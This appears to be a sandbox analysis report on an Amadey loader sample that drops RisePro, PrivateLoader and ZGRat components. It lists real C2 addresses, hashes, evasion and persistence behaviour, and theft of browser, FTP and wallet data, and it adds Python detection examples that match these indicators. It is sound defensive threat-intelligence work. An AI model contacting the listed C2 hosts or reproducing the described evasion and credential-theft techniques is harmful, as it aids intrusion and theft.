Analysis

- max time kernel: 91s
- max time network: 152s
- platform: windows11-21h2_x64
- resource: win11-20240426-en
- resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 12-05-2024 04:40
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
  - Resource: win10v2004-20240508-en
General

- Target: 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
- Size: 1.8MB
- MD5: 44f6004630007026ed35d9037f3d447d
- SHA1: 79922204b4741197dfb045f6243f8d4abf7b655d
- SHA256: 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5
- SHA512: 6aaaa94f531c410a506b30a93b338ff97f5e066618898a5225ab1825f6da030a6ba41838501f0e94269daa13bcf7789f21b8699d01b3fdad4688f0d07544a641
- SSDEEP: 24576:u5qhtFifs6C2D/ZbEPwCjSxvDP8QllwwRJ3olYbQYDWQifu04QCoh2dOw6efpiu9:Z2jZ4PwWCP8QswR30d204bohPw7fUx
Malware Config

Extracted: amadey
- version: 4.20
- C2:
  - http://5.42.96.141
  - http://5.42.96.7
- install_dir: 908f070dff
- install_file: explorku.exe
- strings_key: b25a9385246248a95c600f9a061438e1
- url_paths: /go34ko8/index.php

The install_dir and install_file values match the dropped binary C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe in the process tree below and the C:\Windows\Tasks\explorku.job persistence entry under "Drops file in Windows directory", so this run shows the Amadey loader reaching its installed, persistent stage, not just the unpacked dropper.

Extracted: risepro
- C2: 147.45.47.126:58709
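The two extracted configs are enough to write network detections that do not depend on the host. The Python below is an added example and is not part of the sandbox report or of any vendor tooling: it turns the Amadey C2 hosts plus url_paths and the RisePro ip:port into indicators, then scans constructed, tab-separated Zeek-style http.log and conn.log extracts for them. The log lines, client addresses and timestamps are made up for the example; the only real values are the C2 hosts, path and port from the config above and the pastebin.com / ipinfo.io / api.myip.com hosts listed later under Signatures, which the code treats as corroboration only, since a single lookup of ipinfo.io is not evidence of infection on its own.

```python
from urllib.parse import urlsplit

# Extracted configs exactly as shown in this report.
AMADEY = {"family": "amadey", "version": "4.20",
          "c2": ["http://5.42.96.141", "http://5.42.96.7"],
          "url_paths": ["/go34ko8/index.php"]}
RISEPRO = {"family": "risepro", "c2": ["147.45.47.126:58709"]}

# Legitimate services the sample contacted (pastebin, external-IP lookups):
# worth recording next to a real C2 hit, never an alert by themselves.
CONTEXT_HOSTS = {"pastebin.com", "ipinfo.io", "api.myip.com"}


def build_iocs(http_configs, socket_configs):
    """Derive matchable indicators: full C2 URLs, bare C2 hosts, (ip, port) sockets."""
    urls, hosts, sockets = {}, {}, {}
    for cfg in http_configs:
        for base in cfg["c2"]:
            hosts[urlsplit(base).hostname] = cfg["family"]
            for path in cfg["url_paths"]:
                urls[base.rstrip("/") + path] = cfg["family"]
    for cfg in socket_configs:
        for endpoint in cfg["c2"]:
            ip, port = endpoint.rsplit(":", 1)
            sockets[(ip, int(port))] = cfg["family"]
    return {"urls": urls, "hosts": hosts, "sockets": sockets}


# Constructed log extracts (not from the report). Columns: ts, src, dst, host, uri
HTTP_LOG = """\
1715488801.1\t10.0.0.5\t5.42.96.141\t5.42.96.141\t/go34ko8/index.php
1715488802.3\t10.0.0.5\t5.42.96.7\t5.42.96.7\t/images/logo.png
1715488803.0\t10.0.0.5\t34.117.59.81\tipinfo.io\t/json
1715488804.7\t10.0.0.9\t93.184.216.34\texample.com\t/index.php
"""
# Columns: ts, src, dst, dport, proto
CONN_LOG = """\
1715488805.2\t10.0.0.5\t147.45.47.126\t58709\ttcp
1715488806.0\t10.0.0.5\t147.45.47.126\t443\ttcp
1715488807.4\t10.0.0.9\t8.8.8.8\t53\tudp
"""


def scan_http(log, iocs):
    """Alert tuples (ts, src, severity, family, what). Full URL beats host-only match."""
    alerts = []
    for line in log.splitlines():
        ts, src, _dst, host, uri = line.split("\t")
        url = f"http://{host}{uri}"
        if url in iocs["urls"]:
            alerts.append((ts, src, "high", iocs["urls"][url], url))
        elif host in iocs["hosts"]:          # same C2 host, unknown path: still C2-adjacent
            alerts.append((ts, src, "medium", iocs["hosts"][host], url))
        elif host in CONTEXT_HOSTS:
            alerts.append((ts, src, "info", "context", url))
    return alerts


def scan_conn(log, iocs):
    """Match RisePro's raw TCP C2 socket; the port matters, 443 to the same IP is not in config."""
    alerts = []
    for line in log.splitlines():
        ts, src, dst, dport, proto = line.split("\t")
        if proto == "tcp" and (dst, int(dport)) in iocs["sockets"]:
            alerts.append((ts, src, "high", iocs["sockets"][(dst, int(dport))], f"{dst}:{dport}"))
    return alerts


def correlate(alerts):
    """Promote 'info' context hits to 'medium' for any client that also has a high-confidence hit."""
    hot_clients = {src for _, src, sev, _, _ in alerts if sev == "high"}
    return [(ts, src, "medium" if sev == "info" and src in hot_clients else sev, fam, what)
            for ts, src, sev, fam, what in alerts]


if __name__ == "__main__":
    iocs = build_iocs([AMADEY], [RISEPRO])
    for alert in correlate(scan_http(HTTP_LOG, iocs) + scan_conn(CONN_LOG, iocs)):
        print(*alert, sep="\t")
```

Matching on host plus path rather than on the bare IP keeps the rule usable after the operator moves the panel to a new address but keeps the /go34ko8/index.php gate; matching on the bare IP keeps it usable after they rotate the path. Both are cheap enough to carry.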
Signatures

- Detect ZGRat V1 (3 IoCs)
  yara_rule family_zgrat_v1 matched in memory of PID 5416 (SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, per the process listings below):
  - behavioral2/memory/5416-463-0x000001DBF7C70000-0x000001DBFB4A4000-memory.dmp
  - behavioral2/memory/5416-469-0x000001DBFDE00000-0x000001DBFDF0A000-memory.dmp
  - behavioral2/memory/5416-475-0x000001DBFDD20000-0x000001DBFDD44000-memory.dmp
- Modifies firewall policy service (2 TTPs, 1 IoC)
  - Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" (sxH8wPyOdz7RaPkmDFy3Ezsl.exe)
- PrivateLoader
  PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 8 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by:
  - axplons.exe (x2)
  - ab3480ef7f.exe
  - explorku.exe (x3)
  - 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
  - amers.exe
- Blocklisted process makes network request (1 IoC)
  - flow 53, PID 3628, u1wo.0.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 31 IoCs)
  Run Powershell and hide display window.
  PIDs: 3696 (powershell.EXE), 1008, 4536, 6120, 1480, 3628, 5168, 6024, 1088, 4632, 5088, 3912, 5196, 3404, 3184, 2192, 1972, 956, 3800, 1768, 5536, 1248, 3184, 5828, 6120, 5812, 6128, 1248, 2436, 4648, 5088 (all powershell.exe; 3184, 6120, 1248 and 5088 each appear twice)
- Downloads MZ/PE file
- Modifies Windows Firewall (2 TTPs, 4 IoCs)
  - netsh.exe PIDs: 5740, 5712, 6072, 4648
- Checks BIOS information in registry (2 TTPs, 18 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Key values queried under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System:
  - 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe: SystemBiosVersion, VideoBiosVersion
  - explorku.exe: SystemBiosVersion (x3), VideoBiosVersion (x3)
  - amers.exe: SystemBiosVersion, VideoBiosVersion
  - axplons.exe: SystemBiosVersion (x2), VideoBiosVersion (x2)
  - ab3480ef7f.exe: SystemBiosVersion, VideoBiosVersion
  - Install.exe: SystemBiosVersion (x2)
- Executes dropped EXE (29 IoCs)
  - 428 explorku.exe
  - 4888 explorku.exe
  - 696 amers.exe
  - 3856 axplons.exe
  - 3668 ab3480ef7f.exe
  - 4644 file300un.exe
  - 1336 NewB.exe
  - 3180 ISetup8.exe
  - 4692 axplons.exe
  - 1028 explorku.exe
  - 3864 NewB.exe
  - 2808 u2gc.0.exe
  - 4600 u2gc.1.exe
  - 2472 Hvoiy4AeWVSFQ1Iu3PervIKv.exe
  - 916 KJrrevHavC5XbNvd93Zt87NV.exe
  - 3004 Zl7alJlvns99KqkrvTPtua9F.exe
  - 4700 sd9DA3ZWGLEoKHgSiqfkjIaO.exe
  - 5060 sxH8wPyOdz7RaPkmDFy3Ezsl.exe
  - 940 QB6YJisOeMAwgSEX9tGB7uFD.exe
  - 3628 u1wo.0.exe
  - 5668 u1wo.1.exe
  - 2268 Zl7alJlvns99KqkrvTPtua9F.exe
  - 2392 sd9DA3ZWGLEoKHgSiqfkjIaO.exe
  - 5516 QB6YJisOeMAwgSEX9tGB7uFD.exe
  - 5480 KJrrevHavC5XbNvd93Zt87NV.exe
  - 5948 9jNfLlKCEF3ERyMnjj34oq77.exe
  - 812 Install.exe
  - 1532 OiMQrdAwVVHWkDVgxlIifdu6.exe
  - 2884 Install.exe
- Identifies Wine through registry keys (2 TTPs, 7 IoCs)
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened: \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine by:
  - explorku.exe (x3)
  - amers.exe
  - axplons.exe (x2)
  - 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
- Loads dropped DLL (2 IoCs)
  - 2808 u2gc.0.exe (x2)
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Themida packer (yara_rule themida, 11 IoCs; the signature heading was lost in extraction and is taken from the rule name)
  - behavioral2/files/0x000100000002aa1c-91.dat
  - behavioral2/memory/3668-NNN-0x0000000000180000-0x0000000000811000-memory.dmp for NNN = 105, 106, 107, 108, 109, 110, 111, 112, 113, 119 (PID 3668 is ab3480ef7f.exe, per "Executes dropped EXE")
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 1 IoC)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\ab3480ef7f.exe = "C:\\Users\\Admin\\1000006002\\ab3480ef7f.exe" (explorku.exe)
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

- Queries the UAC EnableLUA policy value (1 IoC)
  - Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (ab3480ef7f.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  - flow 13: pastebin.com
  - flow 19: pastebin.com

- Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  - flow 13: ipinfo.io
  - flow 18: api.myip.com
  - flow 39: api.myip.com
  - flow 40: ipinfo.io
- Drops file in System32 directory (13 IoCs)
  - powershell.exe: File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive (x7)
  - powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  - powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  - sxH8wPyOdz7RaPkmDFy3Ezsl.exe: File opened for modification C:\Windows\System32\GroupPolicy
  - sxH8wPyOdz7RaPkmDFy3Ezsl.exe: File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini
  - sxH8wPyOdz7RaPkmDFy3Ezsl.exe: File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI
  - sxH8wPyOdz7RaPkmDFy3Ezsl.exe: File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol
  The systemprofile paths are the LocalSystem account's profile, so the 32-bit (SysWOW64) PowerShell that wrote them was running as SYSTEM rather than as the Admin user who launched the sample. The Registry.pol and gpt.ini writes are local Group Policy edits by the same sxH8wPyOdz7RaPkmDFy3Ezsl.exe that changes the firewall policy above.
- Suspicious use of NtSetInformationThreadHideFromDebugger (7 IoCs)
  - 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
  - 428 explorku.exe
  - 4888 explorku.exe
  - 696 amers.exe
  - 3856 axplons.exe
  - 4692 axplons.exe
  - 1028 explorku.exe
- Suspicious use of SetThreadContext (2 IoCs)
  - PID 428 (explorku.exe) set thread context of 4888 (procid_target 84)
  - PID 956 (powershell.exe) set thread context of 2096 (procid_target 109)
  Both pairs also appear under "Suspicious use of WriteProcessMemory" below: explorku.exe writes into a second explorku.exe (PID 4888) twelve times and then resets its thread context, which is the process-hollowing sequence, and powershell.exe does the same to PID 2096, which the AdjustPrivilegeToken entries identify as installutil.exe, a signed Microsoft .NET utility used here as the injection host.
- Checks for VirtualBox DLLs, possible anti-VM trick (1 TTP, 4 IoCs)
  Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM. \??\VBoxMiniRdrDN is the device exposed by the VirtualBox shared-folders redirector driver; opening it only succeeds inside a VirtualBox guest with Guest Additions installed.
  File opened (read-only): \??\VBoxMiniRdrDN by:
  - sd9DA3ZWGLEoKHgSiqfkjIaO.exe
  - KJrrevHavC5XbNvd93Zt87NV.exe
  - QB6YJisOeMAwgSEX9tGB7uFD.exe
  - Zl7alJlvns99KqkrvTPtua9F.exe
- Drops file in Windows directory (3 IoCs)
  - File created C:\Windows\Tasks\explorku.job (2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe)
  - File created C:\Windows\Tasks\axplons.job (amers.exe)
  - File created C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job (schtasks.exe)
- Launches sc.exe (1 IoC)
  sc.exe is a Windows utility to control services on the system.
  - 5504 sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (2 IoCs)
  - WerFault.exe PID 5060 for crashed PID 3180 (procid_target 96; ISetup8.exe per "Executes dropped EXE")
  - WerFault.exe PID 5744 for crashed PID 2472 (procid_target 113; Hvoiy4AeWVSFQ1Iu3PervIKv.exe per "Executes dropped EXE")
- Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Key \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI:
  - opened, queried and enumerated by u2gc.1.exe
  - opened, queried and enumerated by u1wo.1.exe
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (u2gc.0.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (u2gc.0.exe)
- Creates scheduled task(s) (1 TTP, 16 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - schtasks.exe PIDs: 1792, 4744, 2624, 2444, 5496, 5800, 5876, 2528, 2548, 5476, 5712, 4968, 3728, 5672, 5932, 1432
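The anti-analysis signatures above (the VirtualBox ACPI key, SystemBiosVersion/VideoBiosVersion, the Wine key, the \??\VBoxMiniRdrDN device, the SCSI enumeration and the ProcessorNameString query) and the persistence ones (the Run key, the .job files in C:\Windows\Tasks, the FirewallRules value) are each a single registry or file path, which is all a host-side detection needs. The Python below is an added example, not the sandbox's own signature engine: it encodes those paths as rules, runs them over constructed Sysmon-style registry/file events, and aggregates by process. The event shapes, the pids 1234 and 777, msiexec.exe and explorer.exe, and the rule names and categories are this example's own; the paths and the real pids are copied from this report. The one design point worth copying is the threshold: installers and hardware-inventory tools read SystemBiosVersion too, so a process is only called anti-analysis when it trips two or more distinct anti-VM rules.

```python
import re
from collections import defaultdict

# (name, category, event types the rule applies to, regex over the event target).
# Paths are the report's; names and categories are this example's own.
RULES = [
    ("vbox_acpi_dsdt", "anti-vm", {"RegistryOpen"},
     r"\\HARDWARE\\ACPI\\DSDT\\VBOX__$"),
    ("bios_version_query", "anti-vm", {"RegistryQueryValue"},
     r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$"),
    ("wine_key", "anti-vm", {"RegistryOpen"}, r"\\Software\\Wine$"),
    ("scsi_enum", "anti-vm", {"RegistryOpen", "RegistryQueryValue", "RegistryEnumerate"},
     r"\\SYSTEM\\ControlSet\d+\\Enum\\SCSI$"),
    ("cpu_name_query", "anti-vm", {"RegistryQueryValue"},
     r"\\CentralProcessor\\0\\ProcessorNameString$"),
    ("vbox_minirdr_device", "anti-vm", {"FileOpen"}, r"^\\\?\?\\VBoxMiniRdrDN$"),
    ("run_key_set", "persistence", {"RegistrySetValue"},
     r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$"),
    ("tasks_job_file", "persistence", {"FileCreate"}, r"^C:\\Windows\\Tasks\\[^\\]+\.job$"),
    ("firewall_rule_set", "defense-evasion", {"RegistrySetValue"},
     r"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\"),
]
COMPILED = [(name, kinds, re.compile(rx, re.IGNORECASE)) for name, _, kinds, rx in RULES]
CATEGORY = {name: cat for name, cat, _, _ in RULES}


def ev(pid, image, kind, target):
    """Minimal Sysmon-like event record (constructed shape, not Sysmon's XML)."""
    return {"pid": pid, "image": image, "event": kind, "target": target}


SAMPLE = "2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe"
HKCU = "\\REGISTRY\\USER\\S-1-5-21-2551177587-3778486488-1329702901-1000"
HKLM_HW = "\\REGISTRY\\MACHINE\\HARDWARE"

# Constructed events built from the report's IoCs, plus two benign ones for contrast.
EVENTS = [
    ev(3772, SAMPLE, "RegistryOpen", HKLM_HW + "\\ACPI\\DSDT\\VBOX__"),
    ev(3772, SAMPLE, "RegistryQueryValue", HKLM_HW + "\\DESCRIPTION\\System\\SystemBiosVersion"),
    ev(3772, SAMPLE, "RegistryOpen", HKCU + "\\Software\\Wine"),
    ev(3772, SAMPLE, "FileCreate", "C:\\Windows\\Tasks\\explorku.job"),
    ev(428, "explorku.exe", "RegistryOpen", HKLM_HW + "\\ACPI\\DSDT\\VBOX__"),
    ev(428, "explorku.exe", "RegistrySetValue",
       HKCU + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ab3480ef7f.exe"),
    ev(4600, "u2gc.1.exe", "RegistryOpen", "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Enum\\SCSI"),
    ev(4600, "u2gc.1.exe", "RegistryEnumerate", "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Enum\\SCSI"),
    ev(5060, "sxH8wPyOdz7RaPkmDFy3Ezsl.exe", "RegistrySetValue",
       "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters"
       "\\FirewallPolicy\\FirewallRules\\C:\\"),
    # Benign noise (hypothetical): an installer reading the BIOS string, Explorer on its own keys.
    ev(1234, "msiexec.exe", "RegistryQueryValue", HKLM_HW + "\\DESCRIPTION\\System\\SystemBiosVersion"),
    ev(777, "explorer.exe", "RegistryOpen", HKCU + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer"),
]


def match_rules(event):
    """Names of every rule a single event satisfies."""
    return [name for name, kinds, rx in COMPILED
            if event["event"] in kinds and rx.search(event["target"])]


def triage(events, min_anti_vm_rules=2):
    """Per-pid rule hits and verdicts. One anti-VM hit alone is not a verdict."""
    per_pid = {}
    for event in events:
        for name in match_rules(event):
            entry = per_pid.setdefault(event["pid"], {"image": event["image"], "rules": set()})
            entry["rules"].add(name)
    report = {}
    for pid, entry in per_pid.items():
        by_cat = defaultdict(set)
        for name in entry["rules"]:
            by_cat[CATEGORY[name]].add(name)
        verdicts = []
        if len(by_cat["anti-vm"]) >= min_anti_vm_rules:
            verdicts.append("anti-analysis")
        for cat in ("persistence", "defense-evasion"):
            if by_cat[cat]:
                verdicts.append(cat)
        report[pid] = {"image": entry["image"], "rules": sorted(entry["rules"]), "verdicts": verdicts}
    return report


if __name__ == "__main__":
    for pid, row in triage(EVENTS).items():
        print(pid, row["image"], row["verdicts"], row["rules"])
```

u2gc.1.exe ends up with a single rule (scsi_enum) despite three registry operations, because the threshold counts distinct rules rather than events; that is deliberate, since one noisy check repeated is still one check.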
- Enumerates system info in registry (2 TTPs, 4 IoCs)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe, x2)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe, x2)
- Modifies data under HKEY_USERS (64 IoCs)
  All MuiCache entries below are string values set by sd9DA3ZWGLEoKHgSiqfkjIaO.exe under \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll; all other entries are by powershell.exe. Order is as reported.
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  - MuiCache ,-2772 = "Omsk Standard Time"
  - MuiCache ,-1831 = "Russia TZ 2 Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
  - MuiCache ,-334 = "Jordan Daylight Time"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
  - MuiCache ,-392 = "Arab Standard Time"
  - MuiCache ,-841 = "Argentina Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
  - MuiCache ,-842 = "Argentina Standard Time"
  - MuiCache ,-382 = "South Africa Standard Time"
  - MuiCache ,-231 = "Hawaiian Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
  - MuiCache ,-1932 = "Russia TZ 11 Standard Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
  - MuiCache ,-2181 = "Astrakhan Daylight Time"
  - MuiCache ,-2412 = "Marquesas Standard Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  - MuiCache ,-981 = "Kamchatka Daylight Time"
  - MuiCache ,-931 = "Coordinated Universal Time"
  - MuiCache ,-432 = "Iran Standard Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
  - MuiCache ,-2871 = "Magallanes Daylight Time"
  - MuiCache ,-131 = "US Eastern Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  - MuiCache ,-1971 = "Belarus Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  - MuiCache ,-662 = "Cen. Australia Standard Time"
  - MuiCache ,-361 = "GTB Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  - MuiCache ,-391 = "Arab Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  - MuiCache ,-681 = "E. Australia Daylight Time"
  - MuiCache ,-1501 = "Turkey Daylight Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  - MuiCache ,-491 = "India Daylight Time"
  - MuiCache ,-1871 = "Russia TZ 7 Daylight Time"
  - MuiCache ,-2631 = "Norfolk Daylight Time"
  - MuiCache ,-1912 = "Russia TZ 10 Standard Time"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  Writes under \REGISTRY\USER\.DEFAULT are another sign of code running as SYSTEM: .DEFAULT is the hive loaded for the LocalSystem account, not for the logged-on Admin user.
- Suspicious behavior: EnumeratesProcesses (64 IoCs, grouped by PID with repeat counts)
  - 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe (x2)
  - 428 explorku.exe (x2)
  - 4888 explorku.exe (x2)
  - 696 amers.exe (x2)
  - 3856 axplons.exe (x2)
  - 956 powershell.exe (x8)
  - 4692 axplons.exe (x2)
  - 1028 explorku.exe (x2)
  - 2808 u2gc.0.exe (x2)
  - 5088 powershell.exe (x3)
  - 4648 powershell.exe (x3)
  - 3184 powershell.exe (x3)
  - 3800 powershell.exe (x3)
  - 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (x24)
  - 916 KJrrevHavC5XbNvd93Zt87NV.exe (x2)
  - 940 QB6YJisOeMAwgSEX9tGB7uFD.exe
  - 3004 Zl7alJlvns99KqkrvTPtua9F.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs, grouped by PID; order of first appearance)
  - 956 powershell.exe: SeDebugPrivilege
  - 2096 installutil.exe: SeDebugPrivilege
  - 5088 powershell.exe: SeDebugPrivilege (x2)
  - 4648 powershell.exe: SeDebugPrivilege
  - 3184 powershell.exe: SeDebugPrivilege (x2)
  - 3800 powershell.exe: SeDebugPrivilege
  - 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe: SeDebugPrivilege
  - 916 KJrrevHavC5XbNvd93Zt87NV.exe: SeDebugPrivilege, SeImpersonatePrivilege
  - 940 QB6YJisOeMAwgSEX9tGB7uFD.exe: SeDebugPrivilege, SeImpersonatePrivilege
  - 3004 Zl7alJlvns99KqkrvTPtua9F.exe: SeDebugPrivilege, SeImpersonatePrivilege
  - 4700 sd9DA3ZWGLEoKHgSiqfkjIaO.exe: SeDebugPrivilege, SeImpersonatePrivilege
  - 5828, 6120, 5196, 3404, 5812, 1768, 6128, 2192, 1248, 4632, 5536, 2436 (all powershell.exe): SeDebugPrivilege, one each
  - 5208 WMIC.exe, first round (21): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the last four are reported by LUID only)
